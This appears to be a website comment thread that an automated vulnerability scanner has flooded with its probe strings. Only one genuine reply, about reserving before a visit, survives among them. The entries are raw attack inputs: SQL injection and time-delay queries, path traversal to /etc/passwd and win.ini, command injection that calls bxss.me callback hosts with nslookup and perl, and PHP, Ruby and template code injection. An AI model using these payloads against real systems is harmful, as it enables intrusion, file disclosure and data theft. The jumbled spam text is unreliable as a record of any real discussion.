unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Leo Saito
<!--
re: Leo Saito
WEB-INF/web.xml
re: Leo Saito
WEB-INF\web.xml
re: Leo Saito
1
re: Leo Saito
1
re: Leo Saito
-1 OR 2+47-47-1=0+0+0+1 --
re: Leo Saito
-1 OR 3+47-47-1=0+0+0+1 --
re: Leo Saito
-1 OR 2+712-712-1=0+0+0+1
re: Leo Saito
-1 OR 3+712-712-1=0+0+0+1
re: Leo Saito
-1' OR 2+18-18-1=0+0+0+1 --
re: Leo Saito
-1' OR 3+18-18-1=0+0+0+1 --
re: Leo Saito
-1' OR 2+690-690-1=0+0+0+1 or '0hOKOz48'='
re: Leo Saito
-1' OR 3+690-690-1=0+0+0+1 or '0hOKOz48'='
re: Leo Saito
-1" OR 2+45-45-1=0+0+0+1 --
re: Leo Saito
-1" OR 3+45-45-1=0+0+0+1 --
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
ODq8aUj6'; waitfor delay '0:0:15' --
re: Leo Saito
-5 OR 514=(SELECT 514 FROM PG_SLEEP(15))--
re: Leo Saito
-5) OR 512=(SELECT 512 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 471=(SELECT 471 FROM PG_SLEEP(15))--
re: Leo Saito
RAusMjtQ' OR 870=(SELECT 870 FROM PG_SLEEP(15))--
re: Leo Saito
kHHLat6z') OR 465=(SELECT 465 FROM PG_SLEEP(15))--
re: Leo Saito
2UMWrnqv')) OR 613=(SELECT 613 FROM PG_SLEEP(15))--
re: Leo Saito
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@WuNc0
re: Leo Saito
1
re: Leo Saito
1
re: Leo Saito
1
Thank you very much Saito San for the information. I will make sure to reserve first before I visit.
re: paul_paulpiwat
pQimTKbZ
re: paul_paulpiwat
1*
re: paul_paulpiwat
1*
re: paul_paulpiwat
1*
re: paul_paulpiwat
1*
re: paul_paulpiwat
-1 OR 2+532-532-1=0+0+0+1
re: paul_paulpiwat
-1 OR 3+532-532-1=0+0+0+1
re: paul_paulpiwat
if(now()=sysdate(),sleep(15),0)
re: paul_paulpiwat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: paul_paulpiwat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: paul_paulpiwat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: paul_paulpiwat
-1; waitfor delay '0:0:15' --
re: paul_paulpiwat
-1); waitfor delay '0:0:15' --
re: paul_paulpiwat
1 waitfor delay '0:0:15' --
re: paul_paulpiwat
2PiK83zA'; waitfor delay '0:0:15' --
re: paul_paulpiwat
-5 OR 736=(SELECT 736 FROM PG_SLEEP(15))--
re: paul_paulpiwat
-5) OR 118=(SELECT 118 FROM PG_SLEEP(15))--
re: paul_paulpiwat
-1)) OR 996=(SELECT 996 FROM PG_SLEEP(15))--
re: paul_paulpiwat
oRtWO2Xq' OR 168=(SELECT 168 FROM PG_SLEEP(15))--
re: paul_paulpiwat
XFSqmvl7') OR 668=(SELECT 668 FROM PG_SLEEP(15))--
re: paul_paulpiwat
JSnxmLPa')) OR 32=(SELECT 32 FROM PG_SLEEP(15))--
re: paul_paulpiwat
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: paul_paulpiwat
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: paul_paulpiwat
'||(select 1 from (select pg_sleep(15))x)||'
re: paul_paulpiwat
''||(select 1 from (select pg_sleep(15))x)||''
re: paul_paulpiwat
1'"
re: paul_paulpiwat
@@7J8qW
re: paul_paulpiwat
e19G0rQi
re: paul_paulpiwat
1*
re: paul_paulpiwat
1*
re: paul_paulpiwat
1*
re: paul_paulpiwat
1*
re: paul_paulpiwat
-1 OR 2+131-131-1=0+0+0+1
re: paul_paulpiwat
-1 OR 3+131-131-1=0+0+0+1
re: paul_paulpiwat
if(now()=sysdate(),sleep(15),0)
re: paul_paulpiwat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: paul_paulpiwat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: paul_paulpiwat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: paul_paulpiwat
-1; waitfor delay '0:0:15' --
re: paul_paulpiwat
-1); waitfor delay '0:0:15' --
re: paul_paulpiwat
1 waitfor delay '0:0:15' --
re: paul_paulpiwat
oFexYzs5'; waitfor delay '0:0:15' --
re: paul_paulpiwat
-5 OR 332=(SELECT 332 FROM PG_SLEEP(15))--
re: paul_paulpiwat
-5) OR 767=(SELECT 767 FROM PG_SLEEP(15))--
re: paul_paulpiwat
-1)) OR 309=(SELECT 309 FROM PG_SLEEP(15))--
re: paul_paulpiwat
n5GFjywi' OR 607=(SELECT 607 FROM PG_SLEEP(15))--
re: paul_paulpiwat
Zi9ZRia0') OR 78=(SELECT 78 FROM PG_SLEEP(15))--
re: paul_paulpiwat
rY2iTYrH')) OR 492=(SELECT 492 FROM PG_SLEEP(15))--
re: paul_paulpiwat
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: paul_paulpiwat
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: paul_paulpiwat
'||(select 1 from (select pg_sleep(15))x)||'
re: paul_paulpiwat
''||(select 1 from (select pg_sleep(15))x)||''
re: paul_paulpiwat
1'"
re: paul_paulpiwat
@@praIz
re: paul_paulpiwat
1XNXrPKGO
re: paul_paulpiwat
response.write(9714615*9556597)
re: paul_paulpiwat
'+response.write(9714615*9556597)+'
re: paul_paulpiwat
"+response.write(9714615*9556597)+"
re: paul_paulpiwat
%0abcc:074625.67-10249.67.88d8d.19990.2@bxss.me
re: paul_paulpiwat
to@example.com>%0d%0abcc:074625.67-10250.67.88d8d.19990.2@bxss.me
re: paul_paulpiwat
../../../../../../../../../../../../../../etc/passwd
re: paul_paulpiwat
<esi:include src="http://bxss.me/rpb.png"/>
re: paul_paulpiwat
../../../../../../../../../../../../../../windows/win.ini
re: paul_paulpiwat
${9999403+10000404}
re: paul_paulpiwat
file:///etc/passwd
re: paul_paulpiwat
../../../../../../../../../../../../../../../proc/version
re: paul_paulpiwat
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: paul_paulpiwat
../../../../../../../../../../etc/passwd%00.jpg
re: paul_paulpiwat
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: paul_paulpiwat
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: paul_paulpiwat
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: paul_paulpiwat
)
re: paul_paulpiwat
/etc/passwd
re: paul_paulpiwat
!(()&&!|*|*|
re: paul_paulpiwat
echo huljwv$()\ fklgto\nz^xyu||a #' &echo huljwv$()\ fklgto\nz^xyu||a #|" &echo huljwv$()\ fklgto\nz^xyu||a #
re: paul_paulpiwat
%2fetc%2fpasswd
re: paul_paulpiwat
^(#$!@#$)(()))******
re: paul_paulpiwat
&echo idicrz$()\ nyppru\nz^xyu||a #' &echo idicrz$()\ nyppru\nz^xyu||a #|" &echo idicrz$()\ nyppru\nz^xyu||a #
re: paul_paulpiwat
/.././.././.././.././.././.././.././../etc/./passwd%00
re: paul_paulpiwat
|echo kngdwh$()\ weaicn\nz^xyu||a #' |echo kngdwh$()\ weaicn\nz^xyu||a #|" |echo kngdwh$()\ weaicn\nz^xyu||a #
re: paul_paulpiwat
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: paul_paulpiwat
(nslookup hitwtkejwygsi7b404.bxss.me||perl -e "gethostbyname('hitwtkejwygsi7b404.bxss.me')")
re: paul_paulpiwat
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: paul_paulpiwat
$(nslookup hitgxdgxbbgra03331.bxss.me||perl -e "gethostbyname('hitgxdgxbbgra03331.bxss.me')")
re: paul_paulpiwat
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: paul_paulpiwat
&nslookup hithngcjlhbivbc3fc.bxss.me&'\"`0&nslookup hithngcjlhbivbc3fc.bxss.me&`'
re: paul_paulpiwat
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: paul_paulpiwat
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: paul_paulpiwat
'.gethostbyname(lc('hitmf'.'jznkzbnmaa6e8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(70).chr(112).chr(87).'
re: paul_paulpiwat
&(nslookup hitetmmioxtwe1bd86.bxss.me||perl -e "gethostbyname('hitetmmioxtwe1bd86.bxss.me')")&'\"`0&(nslookup hitetmmioxtwe1bd86.bxss.me||perl -e "gethostbyname('hitetmmioxtwe1bd86.bxss.me')")&`'
re: paul_paulpiwat
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: paul_paulpiwat
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: paul_paulpiwat
".gethostbyname(lc("hitbb"."docbsjwp70729.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(90).chr(100).chr(82)."
re: paul_paulpiwat
|(nslookup hitpwjkkjpgsj058b3.bxss.me||perl -e "gethostbyname('hitpwjkkjpgsj058b3.bxss.me')")
re: paul_paulpiwat
Http://bxss.me/t/fit.txt
re: paul_paulpiwat
file:///etc/passwd
re: paul_paulpiwat
`(nslookup hithrevduizfl4f4d1.bxss.me||perl -e "gethostbyname('hithrevduizfl4f4d1.bxss.me')")`
re: paul_paulpiwat
http://bxss.me/t/fit.txt%3F.jpg
re: paul_paulpiwat
/\../\../\../\../\../\../\../etc/passwd
re: paul_paulpiwat
;(nslookup hitedybhpjjzkf33cf.bxss.me||perl -e "gethostbyname('hitedybhpjjzkf33cf.bxss.me')")|(nslookup hitedybhpjjzkf33cf.bxss.me||perl -e "gethostbyname('hitedybhpjjzkf33cf.bxss.me')")&(nslookup hitedybhpjjzkf33cf.bxss.me||perl -e "gethostbyname('hitedybhpjjzkf33cf.bxss.me')")
re: paul_paulpiwat
/etc/shells
re: paul_paulpiwat
/WEB-INF/web.xml
re: paul_paulpiwat
c:/windows/win.ini
re: paul_paulpiwat
C:\WINDOWS\system32\drivers\etc\hosts
re: paul_paulpiwat
bxss.me
re: paul_paulpiwat
../../../../../../../../../../windows/win.ini%00.jpg
re: paul_paulpiwat
HttP://bxss.me/t/xss.html?%00
re: paul_paulpiwat
"+"A".concat(70-3).concat(22*4).concat(108).concat(87).concat(117).concat(68)+(require"socket"
Socket.gethostbyname("hitrw"+"wqcxqpdm4df2c.bxss.me.")[3].to_s)+"
re: paul_paulpiwat
/../../../../../../../../../../boot.ini
re: paul_paulpiwat
bxss.me/t/xss.html?%00
re: paul_paulpiwat
'+'A'.concat(70-3).concat(22*4).concat(118).concat(76).concat(107).concat(67)+(require'socket'
Socket.gethostbyname('hitfa'+'ioqdjbxd0d926.bxss.me.')[3].to_s)+'
re: paul_paulpiwat
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: paul_paulpiwat
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: paul_paulpiwat
..\..\..\..\..\..\..\..\windows\win.ini
re: paul_paulpiwat
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: paul_paulpiwat
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: paul_paulpiwat
';print(md5(31337));$a='
re: paul_paulpiwat
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: paul_paulpiwat
";print(md5(31337));$a="
re: paul_paulpiwat
'"
re: paul_paulpiwat
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: paul_paulpiwat
${@print(md5(31337))}
re: paul_paulpiwat
<!--
re: paul_paulpiwat
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: paul_paulpiwat
${@print(md5(31337))}\
re: paul_paulpiwat
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\